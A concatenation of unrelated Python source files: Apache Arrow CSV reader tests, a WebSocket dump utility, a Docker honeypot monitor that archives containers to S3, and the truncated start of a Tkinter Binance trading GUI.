('b', pa.int64())])
assert reader.schema == expected_schema
assert reader.read_next_batch().to_pydict() == {
'a': [123], 'b': [456]
}
# Second block
with pytest.raises(ValueError,
match="CSV conversion error to int64"):
reader.read_next_batch()
# EOF
with pytest.raises(StopIteration):
reader.read_next_batch()
# Inference on first block, then conversion failure on second block,
# then success on third block
rows = b"a,b\n1,2\nabc,def\n45,67\n"
read_options.block_size = 8
reader = self.open_bytes(rows, read_options=read_options)
expected_schema = pa.schema([('a', pa.int64()),
('b', pa.int64())])
assert reader.schema == expected_schema
assert reader.read_next_batch().to_pydict() == {'a': [1], 'b': [2]}
# Second block
with pytest.raises(ValueError,
match="CSV conversion error to int64"):
reader.read_next_batch()
# Third block
assert reader.read_next_batch().to_pydict() == {'a': [45], 'b': [67]}
# EOF
with pytest.raises(StopIteration):
reader.read_next_batch()
def test_invalid_csv(self):
# CSV errors on first block
rows = b"a,b\n1,2,3\n4,5\n6,7\n"
read_options = ReadOptions()
read_options.block_size = 10
with pytest.raises(pa.ArrowInvalid,
match="Expected 2 columns, got 3"):
reader = self.open_bytes(rows, read_options=read_options)
# CSV errors on second block
rows = b"a,b\n1,2\n3,4,5\n6,7\n"
read_options.block_size = 8
reader = self.open_bytes(rows, read_options=read_options)
assert reader.read_next_batch().to_pydict() == {'a': [1], 'b': [2]}
with pytest.raises(pa.ArrowInvalid,
match="Expected 2 columns, got 3"):
reader.read_next_batch()
# Cannot continue after a parse error
with pytest.raises(StopIteration):
reader.read_next_batch()
def test_options_delimiter(self):
rows = b"a;b,c\nde,fg;eh\n"
reader = self.open_bytes(rows)
expected_schema = pa.schema([('a;b', pa.string()),
('c', pa.string())])
self.check_reader(reader, expected_schema,
[{'a;b': ['de'],
'c': ['fg;eh']}])
opts = ParseOptions(delimiter=';')
reader = self.open_bytes(rows, parse_options=opts)
expected_schema = pa.schema([('a', pa.string()),
('b,c', pa.string())])
self.check_reader(reader, expected_schema,
[{'a': ['de,fg'],
'b,c': ['eh']}])
def test_no_ending_newline(self):
# No \n after last line
rows = b"a,b,c\n1,2,3\n4,5,6"
reader = self.open_bytes(rows)
expected_schema = pa.schema([('a', pa.int64()),
('b', pa.int64()),
('c', pa.int64())])
self.check_reader(reader, expected_schema,
[{'a': [1, 4],
'b': [2, 5],
'c': [3, 6]}])
def test_empty_file(self):
with pytest.raises(ValueError, match="Empty CSV file"):
self.open_bytes(b"")
def test_column_options(self):
# With column_names
rows = b"1,2,3\n4,5,6"
read_options = ReadOptions()
read_options.column_names = ['d', 'e', 'f']
reader = self.open_bytes(rows, read_options=read_options)
expected_schema = pa.schema([('d', pa.int64()),
('e', pa.int64()),
('f', pa.int64())])
self.check_reader(reader, expected_schema,
[{'d': [1, 4],
'e': [2, 5],
'f': [3, 6]}])
# With include_columns
convert_options = ConvertOptions()
convert_options.include_columns = ['f', 'e']
reader = self.open_bytes(rows, read_options=read_options,
convert_options=convert_options)
expected_schema = pa.schema([('f', pa.int64()),
('e', pa.int64())])
self.check_reader(reader, expected_schema,
[{'e': [2, 5],
'f': [3, 6]}])
# With column_types
convert_options.column_types = {'e': pa.string()}
reader = self.open_bytes(rows, read_options=read_options,
convert_options=convert_options)
expected_schema = pa.schema([('f', pa.int64()),
('e', pa.string())])
self.check_reader(reader, expected_schema,
[{'e': ["2", "5"],
'f': [3, 6]}])
# Missing columns in include_columns
convert_options.include_columns = ['g', 'f', 'e']
with pytest.raises(
KeyError,
match="Column 'g' in include_columns does not exist"):
reader = self.open_bytes(rows, read_options=read_options,
convert_options=convert_options)
convert_options.include_missing_columns = True
reader = self.open_bytes(rows, read_options=read_options,
convert_options=convert_options)
expected_schema = pa.schema([('g', pa.null()),
('f', pa.int64()),
('e', pa.string())])
self.check_reader(reader, expected_schema,
[{'g': [None, None],
'e': ["2", "5"],
'f': [3, 6]}])
convert_options.column_types = {'e': pa.string(), 'g': pa.float64()}
reader = self.open_bytes(rows, read_options=read_options,
convert_options=convert_options)
expected_schema = pa.schema([('g', pa.float64()),
('f', pa.int64()),
('e', pa.string())])
self.check_reader(reader, expected_schema,
[{'g': [None, None],
'e': ["2", "5"],
'f': [3, 6]}])
def test_encoding(self):
# latin-1 (invalid utf-8)
rows = b"a,b\nun,\xe9l\xe9phant"
read_options = ReadOptions()
reader = self.open_bytes(rows, read_options=read_options)
expected_schema = pa.schema([('a', pa.string()),
('b', pa.binary())])
self.check_reader(reader, expected_schema,
[{'a': ["un"],
'b': [b"\xe9l\xe9phant"]}])
read_options.encoding = 'latin1'
reader = self.open_bytes(rows, read_options=read_options)
expected_schema = pa.schema([('a', pa.string()),
('b', pa.string())])
self.check_reader(reader, expected_schema,
[{'a': ["un"],
'b': ["éléphant"]}])
# utf-16
rows = (b'\xff\xfea\x00,\x00b\x00\n\x00u\x00n\x00,'
b'\x00\xe9\x00l\x00\xe9\x00p\x00h\x00a\x00n\x00t\x00')
read_options.encoding = 'utf16'
reader = self.open_bytes(rows, read_options=read_options)
expected_schema = pa.schema([('a', pa.string()),
('b', pa.string())])
self.check_reader(reader, expected_schema,
[{'a': ["un"],
'b': ["éléphant"]}])
def test_small_random_csv(self):
csv, expected = make_random_csv(num_cols=2, num_rows=10)
reader = self.open_bytes(csv)
table = reader.read_all()
assert table.schema == expected.schema
assert table.equals(expected)
assert table.to_pydict() == expected.to_pydict()
def test_stress_block_sizes(self):
# Test a number of small block sizes to stress block stitching
csv_base, expected = make_random_csv(num_cols=2, num_rows=500)
block_sizes = [19, 21, 23, 26, 37, 111]
csvs = [csv_base, csv_base.rstrip(b'\r\n')]
for csv in csvs:
for block_size in block_sizes:
# Need at least two lines for type inference
assert csv[:block_size].count(b'\n') >= 2
read_options = ReadOptions(block_size=block_size)
reader = self.open_bytes(csv, read_options=read_options)
table = reader.read_all()
assert table.schema == expected.schema
if not table.equals(expected):
# Better error output
assert table.to_pydict() == expected.to_pydict()
class TestSerialStreamingCSVRead(BaseTestStreamingCSVRead, unittest.TestCase):
def open_csv(self, *args, **kwargs):
read_options = kwargs.setdefault('read_options', ReadOptions())
read_options.use_threads = False
return open_csv(*args, **kwargs)
def test_batch_lifetime(self):
gc.collect()
old_allocated = pa.total_allocated_bytes()
# Memory occupation should not grow with CSV file size
def check_one_batch(reader, expected):
batch = reader.read_next_batch()
assert batch.to_pydict() == expected
rows = b"10,11\n12,13\n14,15\n16,17\n"
read_options = ReadOptions()
read_options.column_names = ['a', 'b']
read_options.block_size = 6
reader = self.open_bytes(rows, read_options=read_options)
check_one_batch(reader, {'a': [10], 'b': [11]})
allocated_after_first_batch = pa.total_allocated_bytes()
check_one_batch(reader, {'a': [12], 'b': [13]})
assert pa.total_allocated_bytes() == allocated_after_first_batch
check_one_batch(reader, {'a': [14], 'b': [15]})
assert pa.total_allocated_bytes() == allocated_after_first_batch
check_one_batch(reader, {'a': [16], 'b': [17]})
assert pa.total_allocated_bytes() == allocated_after_first_batch
with pytest.raises(StopIteration):
reader.read_next_batch()
assert pa.total_allocated_bytes() == old_allocated
reader = None
assert pa.total_allocated_bytes() == old_allocated
class BaseTestCompressedCSVRead:
def setUp(self):
self.tmpdir = tempfile.mkdtemp(prefix='arrow-csv-test-')
def tearDown(self):
shutil.rmtree(self.tmpdir)
def read_csv(self, csv_path):
try:
return read_csv(csv_path)
except pa.ArrowNotImplementedError as e:
pytest.skip(str(e))
def test_random_csv(self):
csv, expected = make_random_csv(num_cols=2, num_rows=100)
csv_path = os.path.join(self.tmpdir, self.csv_filename)
self.write_file(csv_path, csv)
table = self.read_csv(csv_path)
table.validate(full=True)
assert table.schema == expected.schema
assert table.equals(expected)
assert table.to_pydict() == expected.to_pydict()
class TestGZipCSVRead(BaseTestCompressedCSVRead, unittest.TestCase):
csv_filename = "compressed.csv.gz"
def write_file(self, path, contents):
with gzip.open(path, 'wb', 3) as f:
f.write(contents)
def test_concatenated(self):
# ARROW-5974
csv_path = os.path.join(self.tmpdir, self.csv_filename)
with gzip.open(csv_path, 'wb', 3) as f:
f.write(b"ab,cd\nef,gh\n")
with gzip.open(csv_path, 'ab', 3) as f:
f.write(b"ij,kl\nmn,op\n")
table = self.read_csv(csv_path)
assert table.to_pydict() == {
'ab': ['ef', 'ij', 'mn'],
'cd': ['gh', 'kl', 'op'],
}
class TestBZ2CSVRead(BaseTestCompressedCSVRead, unittest.TestCase):
csv_filename = "compressed.csv.bz2"
def write_file(self, path, contents):
with bz2.BZ2File(path, 'w') as f:
f.write(contents)
def test_read_csv_does_not_close_passed_file_handles():
# ARROW-4823
buf = io.BytesIO(b"a,b,c\n1,2,3\n4,5,6")
read_csv(buf)
assert not buf.closed
def test_write_read_round_trip():
t = pa.Table.from_arrays([[1, 2, 3], ["a", "b", "c"]], ["c1", "c2"])
record_batch = t.to_batches(max_chunksize=4)[0]
for data in [t, record_batch]:
# Test with header
buf = io.BytesIO()
write_csv(data, buf, WriteOptions(include_header=True))
buf.seek(0)
assert t == read_csv(buf)
# Test without header
buf = io.BytesIO()
write_csv(data, buf, WriteOptions(include_header=False))
buf.seek(0)
read_options = ReadOptions(column_names=t.column_names)
assert t == read_csv(buf, read_options=read_options)
|
wsdump.py
|
#!/Users/josephbell/Desktop/reddit-scraping/reddit-env/bin/python3
import argparse
import code
import sys
import threading
import time
import ssl
import gzip
import zlib
import six
from six.moves.urllib.parse import urlparse
import websocket
try:
import readline
except ImportError:
pass
def get_encoding():
encoding = getattr(sys.stdin, "encoding", "")
if not encoding:
return "utf-8"
else:
return encoding.lower()
OPCODE_DATA = (websocket.ABNF.OPCODE_TEXT, websocket.ABNF.OPCODE_BINARY)
ENCODING = get_encoding()
class VAction(argparse.Action):
def __call__(self, parser, args, values, option_string=None):
if values is None:
values = "1"
try:
values = int(values)
except ValueError:
values = values.count("v") + 1
setattr(args, self.dest, values)
def parse_args():
parser = argparse.ArgumentParser(description="WebSocket Simple Dump Tool")
parser.add_argument("url", metavar="ws_url",
help="websocket url. ex. ws://echo.websocket.org/")
parser.add_argument("-p", "--proxy",
help="proxy url. ex. http://127.0.0.1:8080")
parser.add_argument("-v", "--verbose", default=0, nargs='?', action=VAction,
dest="verbose",
help="set verbose mode. If set to 1, show opcode. "
"If set to 2, enable to trace websocket module")
parser.add_argument("-n", "--nocert", action='store_true',
help="Ignore invalid SSL cert")
parser.add_argument("-r", "--raw", action="store_true",
help="raw output")
parser.add_argument("-s", "--subprotocols", nargs='*',
help="Set subprotocols")
parser.add_argument("-o", "--origin",
help="Set origin")
parser.add_argument("--eof-wait", default=0, type=int,
help="wait time(second) after 'EOF' received.")
parser.add_argument("-t", "--text",
help="Send initial text")
parser.add_argument("--timings", action="store_true",
help="Print timings in seconds")
parser.add_argument("--headers",
help="Set custom headers. Use ',' as separator")
return parser.parse_args()
class RawInput:
def raw_input(self, prompt):
if six.PY3:
line = input(prompt)
else:
line = raw_input(prompt)
if ENCODING and ENCODING != "utf-8" and not isinstance(line, six.text_type):
line = line.decode(ENCODING).encode("utf-8")
elif isinstance(line, six.text_type):
line = line.encode("utf-8")
return line
class InteractiveConsole(RawInput, code.InteractiveConsole):
def write(self, data):
sys.stdout.write("\033[2K\033[E")
# sys.stdout.write("\n")
sys.stdout.write("\033[34m< " + data + "\033[39m")
sys.stdout.write("\n> ")
sys.stdout.flush()
def read(self):
return self.raw_input("> ")
class NonInteractive(RawInput):
def write(self, data):
sys.stdout.write(data)
sys.stdout.write("\n")
sys.stdout.flush()
def read(self):
return self.raw_input("")
def main():
start_time = time.time()
args = parse_args()
if args.verbose > 1:
websocket.enableTrace(True)
options = {}
if args.proxy:
p = urlparse(args.proxy)
options["http_proxy_host"] = p.hostname
options["http_proxy_port"] = p.port
if args.origin:
options["origin"] = args.origin
if args.subprotocols:
options["subprotocols"] = args.subprotocols
opts = {}
if args.nocert:
opts = {"cert_reqs": ssl.CERT_NONE, "check_hostname": False}
if args.headers:
options['header'] = list(map(str.strip, args.headers.split(',')))
ws = websocket.create_connection(args.url, sslopt=opts, **options)
if args.raw:
console = NonInteractive()
else:
console = InteractiveConsole()
print("Press Ctrl+C to quit")
def recv():
try:
frame = ws.recv_frame()
except websocket.WebSocketException:
return websocket.ABNF.OPCODE_CLOSE, None
if not frame:
raise websocket.WebSocketException("Not a valid frame %s" % frame)
elif frame.opcode in OPCODE_DATA:
return frame.opcode, frame.data
elif frame.opcode == websocket.ABNF.OPCODE_CLOSE:
ws.send_close()
return frame.opcode, None
elif frame.opcode == websocket.ABNF.OPCODE_PING:
ws.pong(frame.data)
return frame.opcode, frame.data
return frame.opcode, frame.data
def recv_ws():
while True:
opcode, data = recv()
msg = None
if six.PY3 and opcode == websocket.ABNF.OPCODE_TEXT and isinstance(data, bytes):
data = str(data, "utf-8")
if isinstance(data, bytes) and len(data)>2 and data[:2] == b'\037\213': # gzip magick
try:
data = "[gzip] " + str(gzip.decompress(data), "utf-8")
except:
pass
elif isinstance(data, bytes):
try:
data = "[zlib] " + str(zlib.decompress(data, -zlib.MAX_WBITS), "utf-8")
except:
pass
if isinstance(data, bytes):
data = repr(data)
if args.verbose:
msg = "%s: %s" % (websocket.ABNF.OPCODE_MAP.get(opcode), data)
else:
msg = data
if msg is not None:
if args.timings:
console.write(str(time.time() - start_time) + ": " + msg)
else:
console.write(msg)
if opcode == websocket.ABNF.OPCODE_CLOSE:
break
thread = threading.Thread(target=recv_ws)
thread.daemon = True
thread.start()
if args.text:
ws.send(args.text)
while True:
try:
message = console.read()
ws.send(message)
except KeyboardInterrupt:
return
except EOFError:
time.sleep(args.eof_wait)
return
if __name__ == "__main__":
try:
main()
except Exception as e:
print(e)
|
monitor.py
|
import sys
import docker
import logging
import threading
import os
import subprocess
import boto3
logging.basicConfig(filename='/var/log/docker_start.log', level=logging.INFO)
threads = []
sc = []
def cleanup(container):
container.stop()
_ = subprocess.call(["/usr/local/bin/honey-clean.sh", container.name])
exists = container.id in sc
if exists:
s3 = boto3.resource('s3')
BUCKET= "honeypot-docker-images"
shell_command = "docker export -o /tmp/" + container.id + ".tar " + container.name
_ = subprocess.call(shell_command.split())
s3.Bucket(BUCKET).upload_file("/tmp/" + container.id + ".tar", container.name + "/" + container.id + ".tar")
os.remove("/tmp/" + container.id + ".tar")
sc.remove(container.id)
container.remove()
def containerTimeout(id, container):
cleanup(container)
def container(cli,id):
failed = 0
container = cli.containers.get(id)
# timer to kill the container after 5 minutes
tr = threading.Timer(5 * 60, containerTimeout, [id, container])
tr.start()
logline = []
for line in container.logs(stream=True):
if '\n' in line.decode('utf-8'):
logline = ''.join(logline)
if 'Accepted password for' in line.decode('utf-8'):
sc.append(container.id)
if 'closed' in line.decode('utf-8'):
container.stop()
container.remove()
break
if 'disconnected' in line.decode('utf-8'):
cleanup(container)
break
#logging.info(str(logline + line.decode('utf-8').strip()))
logline = []
else:
logline.append( line )
return
def start(cli, event):
""" handle 'start' events"""
logging.info(event)
t = threading.Thread(target=container, args=(cli,event.get('id'),))
threads.append(t)
t.start()
thismodule = sys.modules[__name__]
# create a docker client object that talks to the local docker daemon
cli = docker.from_env()
# start listening for new events
#containers = cli.containers.list()
# start listening for new events
events = cli.events(decode=True)
# possible events are:
# attach, commit, copy, create, destroy, die, exec_create, exec_start, export,
# kill, oom, pause, rename, resize, restart, start, stop, top, unpause, update
for event in events:
# if a handler for this event is defined, call it
if (hasattr( thismodule , event['Action'])):
getattr( thismodule , event['Action'])( cli, event )
|
iTrader.py
|
from tkinter import *
from tkinter import Menu
from tkinter import ttk
from tkinter.ttk import Combobox
from tkinter import messagebox
import tkinter.font as font
from binance_api import Binance
import threading
import time
import datetime
import os
import os.path
#Основные глобальные переменные
ep = False
#Button state переменные Deamon процессов
PS1 = False #Timer button_1 state (Start/Stop) true/false
PS_BU = False #Timer button_2 state (Start/Stop) true/false
PS_AB = False #Timer button_AB state (Start/Stop) true/false
PS_OT = False #Timer button_OrdTmr state (Start/Stop) true/false
Ord_Zm = False #Отображать ли Zoom график ордеров - button_Ord state (Zoom/Norm) true/false
#Timer state переменные Deamon процессов
should_run_T = False #Timer TICK start true/false
should_run_C = False #Timer CANDLES start true/false
should_run_S = False #Timer CANDLES SUMM start true/false
should_run_BU = False #Timer BTC/USDT watch start true/false
should_run_AB = False #Timer Account Balances watch start true/false
should_run_OT = False #Timer Order Timer start true/false
should_run_OZ = False #Timer Order Zoom start true/false
TE_Tck = True
TE_Cnd = True
TE_CndSm = True
TE_BU = True
TE_AB = True
TE_Zm = True
TE_OrdTmr = True
#API Keys from Binance
API_KEY_s = ''
API_SECRET_s = ''
bot = Binance(API_KEY='', API_SECRET='')
isAcc = False
sys_msg = ''
yI=0
y0I_TP=0
yM=0
Lo=0
TT0=0
#graph pair param
GS='CANDLE 5m'
grSmb = 'BNBUSDT' #Символ графика
Lo=0 #Last order number
grSt = 16 #шаг цены на графике
grZm = 500 #Graph Zoom number
grOW = 1000 #Graph Order Width
prSt = 0.1 #шаг цены
grH = 1 #высота графика
grW = 1 #ширина графика
grMd = 0.5 #половина высоты графика
NwOrSw=False
#pair param
MS = 'SPOT' #FUTURES or SPOT
MPS = 'USDT'
#symbol param
Lvrg = 1
Lvrg_Tmp = 1
MrgT='NONE'
MrgT_Tmp='NONE'
Isl = True
orLSS=1
#position param
PEP = 0
PSP = 0
PPP = 0
PPP_Tmp = 0
PSP_Tmp = 0
PosSide='LONG'
#Основные глобальные переменные
#Order переменные
yI0Zm = 0 #Текущая цена для OrderZoom
class Timer_Tick:
def __init__(self):
global yI
global Lo
global TE_Tck
while True:
if PS1 == True:
sys_msg = ' Тиковый график ' + grSmb + ' остановлен.'
app.Sys_Msg(text1=sys_msg)
TE_Tck = True
break
if should_run_T:
for i in range(400):
if not should_run_T:
sys_msg = ' Тиковый график ' + grSmb + ' будет остановлен.'
app.Sys_Msg(text1=sys_msg)
break
if should_run_T:
if i==0:
sys_msg = ' Тиковый график ' + grSmb + ' запущен.'
app.Sys_Msg(text1=sys_msg)
TE_Tck = False
if i > 0:
time.sleep(0.01)
#Ссылка для просмотра в браузере: https://api.binance.com/api/v1/depth?symbol=ETHBTC
#limit - кол-во возвращаемых записей от 5 до 1000 (по умолчанию 100).
#Допустимые значения: 5, 10, 20, 50, 100, 500, 1000.
#Еще можно указать 0, но он может вернуть большое кол-во данных.
#Вес зависит от параметра limit. При лимите от 5 до 100 вес будет равен 1.
#Для параметра 500 вес составит 5. Для параметра 1000 вес будет 10.
#print (grSmb)
if MS=='SPOT':
myTup11 = ('depth', bot.depth(symbol=grSmb, limit=50)) #tupl
mylist3 = myTup11[1] #dict
mylist4=mylist3['bids'] #list
mylist5=mylist3['asks'] #list
elif MS=='FUTURES':
myTup11 = ('FutDepth', bot.futuresDepth(symbol=grSmb, limit=50)) #tupl
mylist3 = myTup11[1] #dict
mylist4=mylist3['bids'] #list
mylist5=mylist3['asks'] #list
#print('trades', bot.trades(symbol='BNBUSDT', limit=1))
#Если один купил а другой продал, то это buy или sell?
#Отвечу так: в истории торгов binance зеленым подсвечиваются сделки, у которых isBuyerMaker == false,
#и маджентой - у кого true
#sss41 = "BNBUSDT - trades"
if MS=='SPOT':
myTup12 =('trades', bot.trades(symbol=grSmb, limit=20)) #Tupl
myDicGr1 = myTup12[1][19] #dict
elif MS=='FUTURES':
myTup12 = ('FutTrades', bot.futuresTrades(symbol=grSmb, limit=20)) #tupl
myDicGr1 = myTup12[1][19] #dict
#print(myTup12[1][0])
#print(myTup12[1][19])
if i==0:
yI0=float(myDicGr1['price'])
yI=100
app.graph_1.delete("all")
app.graph_Tb.delete("all")
app.graph_Td.delete("all")
grMd = grH/2
grSt = grZm/(yI0*0.01/prSt)
TT0 = time.mktime(time.localtime())*1000
#print (TT0)
points=[]
pp=(-500,grMd)
points.append(pp)
pp=(500,grMd)
points.append(pp)
app.graph_1.create_line(points,fill="gray",width=1)
if prSt >= 0.1:
app.graph_1.create_text(900,grMd + grSt/2,text="%.2f" % (yI0))
elif 0.1 > prSt >= 0.01:
app.graph_1.create_text(900,grMd + grSt/2,text="%.2f" % (yI0))
elif 0.01 > prSt >= 0.001:
app.graph_1.create_text(900,grMd + grSt/2,text="%.3f" % (yI0))
elif 0.001 > prSt >= 0.0001:
app.graph_1.create_text(900,grMd + grSt/2,text="%.4f" % (yI0))
elif prSt < 0.0001:
app.graph_1.create_text(900,grMd + grSt/2,text="%.8f" % (yI0))
yp=-60
ypi=-4
while yp < 1500:
points=[]
yp = 0 + ypi*60
pp = (yp,-500)
points.append(pp)
pp = (yp,1500)
points.append(pp)
app.graph_1.create_line(points,fill="gray",width=1)
app.graph_Tb.create_line((yp,0,yp,70),fill="gray",width=1)
app.graph_Td.create_line((yp,0,yp,70),fill="gray",width=1)
tm=TT0/1000+ypi*15
tm1 = datetime.datetime.fromtimestamp(tm)
tmm=tm1.strftime("%M:%S")
app.graph_Tb.create_text(0 + ypi*60,10,text=tmm)
app.graph_Td.create_text(0 + ypi*60,10,text=tmm)
ypi += 1
yp=grMd
ypi=1
while yp < 1500:
points=[]
yp=grMd +ypi*((yI0/400)/prSt)*grSt
pp=(-500,yp) #400 == 0.25%
points.append(pp)
pp=(500,yp)
points.append(pp)
app.graph_1.create_line(points,fill="gray",width=1)
if prSt >= 0.1:
app.graph_1.create_text(900,yp + grSt/2,text="%.2f" % (yI0-ypi*(yI0/400)))
elif 0.1 > prSt >= 0.01:
app.graph_1.create_text(900,yp + grSt/2,text="%.2f" % (yI0-ypi*(yI0/400)))
elif 0.01 > prSt >= 0.001:
app.graph_1.create_text(900,yp + grSt/2,text="%.3f" % (yI0-ypi*(yI0/400)))
elif 0.001 > prSt >= 0.0001:
app.graph_1.create_text(900,yp + grSt/2,text="%.4f" % (yI0-ypi*(yI0/400)))
elif prSt < 0.0001:
app.graph_1.create_text(900,yp + grSt/2,text="%.8f" % (yI0-ypi*(yI0/400)))
ypi += 1
yp=grMd
ypi=1
while yp > -1000:
points=[]
yp=grMd - ypi*((yI0/400)/prSt)*grSt
pp=(-500,yp)
points.append(pp)
pp=(500,yp)
points.append(pp)
app.graph_1.create_line(points,fill="gray",width=1)
if prSt >= 0.1:
app.graph_1.create_text(900,yp + grSt/2,text="%.2f" % (yI0+ypi*(yI0/400)))
elif 0.1 > prSt >= 0.01:
app.graph_1.create_text(900,yp + grSt/2,text="%.2f" % (yI0+ypi*(yI0/400)))
elif 0.01 > prSt >= 0.001:
app.graph_1.create_text(900,yp + grSt/2,text="%.3f" % (yI0+ypi*(yI0/400)))
elif 0.001 > prSt >= 0.0001:
app.graph_1.create_text(900,yp + grSt/2,text="%.4f" % (yI0+ypi*(yI0/400)))
elif prSt < 0.0001:
app.graph_1.create_text(900,yp + grSt/2,text="%.8f" % (yI0+ypi*(yI0/400)))
ypi += 1
for mm in range(len(myTup12[1])):
myDicGr1TT = myTup12[1][mm]
if int(myDicGr1TT['id']) > Lo:
xx=myDicGr1TT['time']
xxp = 20 + ((xx - TT0)/1000)*4
yyp = grMd - ((float(myDicGr1TT['price'])-yI0)/prSt)* grSt
if xxp > 1000:
app.graph_1.configure(scrollregion=(-500,-500,xxp+100,1000))
app.graph_Tb.configure(scrollregion=(-500,0,xxp+100,70))
app.graph_Td.configure(scrollregion=(-500,0,xxp+100,70))
#print (grMd, ' - ', yyp)
if float(myDicGr1TT['quoteQty']) < 100:
x1, y1 = (xxp - 1), (yyp - 1)
x2, y2 = (xxp + 1), (yyp + 1)
elif 100 <= float(myDicGr1TT['quoteQty']) <= 1000:
x1, y1 = (xxp - 2 - 3*(float(myDicGr1TT['quoteQty'])/1000)), (yyp -2 - 3*(float(myDicGr1TT['quoteQty'])/1000))
x2, y2 = (xxp + 2 + 3*(float(myDicGr1TT['quoteQty'])/1000)), (yyp + 2 + 3*(float(myDicGr1TT['quoteQty'])/1000))
elif 1000 < float(myDicGr1TT['quoteQty']) <= 10000:
x1, y1 = (xxp - 5 - 3*(float(myDicGr1TT['quoteQty'])/10000)), (yyp - 5 - 3*(float(myDicGr1TT['quoteQty'])/10000))
x2, y2 = (xxp + 5 + 3*(float(myDicGr1TT['quoteQty'])/10000)), (yyp + 5 + 3*(float(myDicGr1TT['quoteQty'])/10000))
elif 10000 < float(myDicGr1TT['quoteQty']) <= 50000:
x1, y1 = (xxp - 8), (yyp - 8)
x2, y2 = (xxp + 8), (yyp + 8)
elif float(myDicGr1TT['quoteQty']) > 50000:
x1, y1 = (xxp - 10), (yyp - 10)
x2, y2 = (xxp + 10), (yyp + 10)
if myDicGr1TT['isBuyerMaker'] == True:
flc = "magenta"
if float(myDicGr1TT['quoteQty']) > 50000:
flc = "black"
else:
flc="green"
if float(myDicGr1TT['quoteQty']) > 50000:
flc = "gold"
app.graph_1.create_oval(x1, y1, x2, y2, fill=flc)
#print(x1,x2,y1,y2)
Lo=int(myDicGr1TT['id'])
#Order Book Graph
app.graph_2.delete("all")
for m in range (int(len(mylist5))):
if float(mylist5[m][1])>0:
points=[]
x0 = 180
y0 = grMd - ((float(mylist5[m][0])-yI0)/prSt)* grSt
#print('-', yI0, ' - ', float(mylist5[m][0]))
pp=(x0,y0)
points.append(pp)
x1 = 180 - (float(mylist5[m][1])/(grOW/100))*10
y1 = grMd - ((float(mylist5[m][0])-yI0)/prSt)* grSt
pp=(x1,y1)
points.append(pp)
app.graph_2.create_line(points,fill="pink",width=grSt)
if float(mylist4[m][1])>0:
points=[]
x0 = 180
y0 = grMd - ((float(mylist4[m][0])-yI0)/prSt)* grSt
#print('-', yI0, ' - ', float(mylist4[m][0]))
pp=(x0,y0)
points.append(pp)
x1 = 180 - (float(mylist4[m][1])/(grOW/100))*10
#print(float(mylist4[m][1]))
y1 = grMd - ((float(mylist4[m][0])-yI0)/prSt)* grSt
pp=(x1,y1)
points.append(pp)
app.graph_2.create_line(points,fill="lightgreen",width=grSt)
class Timer_Candle:
def __init__(self):
#global ss
global TE_Cnd
global yI
global Lo
global PEP
global PSP
global PPP
global y0I_TP
global GPPP_Tmp
global GPSP_Tmp
global grMd
global grSt
global grFt
global GOS_TP
global GOS_SL
grFt_12 = font.Font(size=12)
grFt_10 = font.Font(size=10)
while True:
if PS1 == True:
sys_msg = ' Свечной график ' + grSmb + ' остановлен.'
app.Sys_Msg(text1=sys_msg)
TE_Cnd = True
break
if should_run_C:
for i in range(400):
if not should_run_C:
sys_msg = ' Свечной график ' + grSmb + ' будет остановлен.'
app.Sys_Msg(text1=sys_msg)
break
if should_run_C:
if i==0:
sys_msg = ' Свечной график ' + grSmb + ' запущен.'
app.Sys_Msg(text1=sys_msg)
TE_Cnd = False
if i > 0:
time.sleep(0.5)
if MS=='SPOT':
myTup11 = ('depth', bot.depth(symbol=grSmb, limit=10)) #tupl (IF LIMIT<=50 THEN WEIGHT = 2)
mylist3 = myTup11[1] #dict
mylist4=mylist3['bids'] #list
mylist5=mylist3['asks'] #list
elif MS=='FUTURES':
myTup11 = ('FutDepth', bot.futuresDepth(symbol=grSmb, limit=10)) #tupl (IF LIMIT<=50 THEN WEIGHT = 2)
mylist3 = myTup11[1] #dict
mylist4=mylist3['bids'] #list
mylist5=mylist3['asks'] #list
if i==0:
app.Scale_TP.set(0)
app.Scale_SL.set(0)
#print(myTup11[1])
if MS=='SPOT' and i==0:
if GS=='CANDLE 5m':
myTupSpK =('klines', bot.klines(symbol=grSmb, interval='5m', limit=288)) #Tupl
myTupBTCD =('klines', bot.klines(symbol='BTCUSDT', interval='5m', limit=288))
elif GS=='CANDLE 1m':
myTupSpK =('klines', bot.klines(symbol=grSmb, interval='1m', limit=288)) #Tupl
myTupBTCD =('klines', bot.klines(symbol='BTCUSDT', interval='1m', limit=288))
elif GS=='CANDLE 15m':
myTupSpK =('klines', bot.klines(symbol=grSmb, interval='15m', limit=288)) #Tupl
myTupBTCD =('klines', bot.klines(symbol='BTCUSDT', interval='15m', limit=288))
elif GS=='CANDLE 30m':
myTupSpK =('klines', bot.klines(symbol=grSmb, interval='30m', limit=288)) #Tupl
myTupBTCD =('klines', bot.klines(symbol='BTCUSDT', interval='30m', limit=288))
elif GS=='CANDLE 1h':
myTupSpK =('klines', bot.klines(symbol=grSmb, interval='1h', limit=288)) #Tupl
myTupBTCD =('klines', bot.klines(symbol='BTCUSDT', interval='1h', limit=288))
elif GS=='CANDLE 4h':
myTupSpK =('klines', bot.klines(symbol=grSmb, interval='4h', limit=288)) #Tupl
myTupBTCD =('klines', bot.klines(symbol='BTCUSDT', interval='4h', limit=288))
elif GS=='CANDLE 1d':
myTupSpK =('klines', bot.klines(symbol=grSmb, interval='1d', limit=288)) #Tupl
myTupBTCD =('klines', bot.klines(symbol='BTCUSDT', interval='1d', limit=288))
myDicGr1 = myTupSpK[1] #dict
myDicBTCD = myTupBTCD[1]
#print(myDicGr1)
yI0=float(myDicGr1[287][1])
y0I_TP = yI0
#print (myDicGr1[1][1])
elif MS=='FUTURES' and i==0:
if GS=='CANDLE 5m':
myTupFtK = ('futuresKlines', bot.futuresKlines(symbol=grSmb, interval='5m', limit=288)) #tupl
myTupBTCD = ('futuresKlines', bot.futuresKlines(symbol='BTCUSDT', interval='5m', limit=288)) #tupl
elif GS=='CANDLE 1m':
myTupFtK = ('futuresKlines', bot.futuresKlines(symbol=grSmb, interval='1m', limit=288)) #tupl
myTupBTCD = ('futuresKlines', bot.futuresKlines(symbol='BTCUSDT', interval='1m', limit=288)) #tupl
elif GS=='CANDLE 15m':
myTupFtK = ('futuresKlines', bot.futuresKlines(symbol=grSmb, interval='15m', limit=288)) #tupl
myTupBTCD = ('futuresKlines', bot.futuresKlines(symbol='BTCUSDT', interval='15m', limit=288)) #tupl
elif GS=='CANDLE 30m':
myTupFtK = ('futuresKlines', bot.futuresKlines(symbol=grSmb, interval='30m', limit=288)) #tupl
